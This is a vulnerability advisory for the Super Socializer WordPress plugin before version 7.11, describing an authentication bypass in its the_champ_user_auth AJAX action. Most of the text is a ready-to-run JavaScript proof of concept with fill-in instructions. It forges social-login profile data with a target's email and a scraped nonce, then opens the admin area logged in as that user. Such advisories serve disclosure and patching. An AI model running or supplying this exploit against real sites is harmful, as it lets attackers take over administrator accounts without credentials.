Super Socializer < 7.11 – Authentication Bypass

Description

The the_champ_user_auth AJAX action of the plugin could allow unauthenticated attackers to login as any user by just knowing their email address

Proof of Concept

// Steps:
// Fill this 3 variable
var url = 'http://my-site.com/wordpress/', //website url. Closing slash required
  email = 'john.doe@my-site.com', //The admin email address to exploit
  nonce = 'e86377d05a'; // View the source of the login page: http://my-site.com/wordpress/wp-login.php and search for `security`. copy here the nonce value Ex.: var the_champ_sl_ajax_token = {"ajax_url":"http:\/\/my-site.com\/wordpress\/wp-admin\/admin-ajax.php","security":"e86377d05a"};
// Click on Run in JsFiddle and then click on the Exploit button. It will open a window which first log you in to the user with the given email address then loads the admin area and you will be logged in.

function exploit() {
  var param = {
    action: 'the_champ_user_auth',
    security: nonce,
    'profileData[id]': 'a',
    'profileData[link]': 'a',
    'profileData[name]': 'a',
    'profileData[email]': email,
    'profileData[first_name]': 'a',
    'profileData[last_name]': 'a',
    provider: 'facebook',
    redirectionUrl: encodeURI(url)
  };
  OpenWindowWithPost(url + "wp-admin/admin-ajax.php",
    "width=700,height=345,left=100,top=100,resizable=yes,scrollbars=yes", "exploit", param);


  setTimeout(function() {
    window.open(url + "wp-admin/", 'exploit');
  }, 2000);
}

$(document).ready(function() {
  $('button').on('click', exploit);
});


function OpenWindowWithPost(url, windowoption, name, params) {
  var form = document.createElement("form");
  form.setAttribute("method", "post");
  form.setAttribute("action", url);
  form.setAttribute("target", name);

  for (var i in params) {
    if (params.hasOwnProperty(i)) {
      var input = document.createElement('input');
      input.type = 'hidden';
      input.name = i;
      input.value = params[i];
      form.appendChild(input);
    }
  }

  document.body.appendChild(form);

  var wnd = window.open("", name, windowoption);

  form.submit();

  document.body.removeChild(form);

  return wnd;
}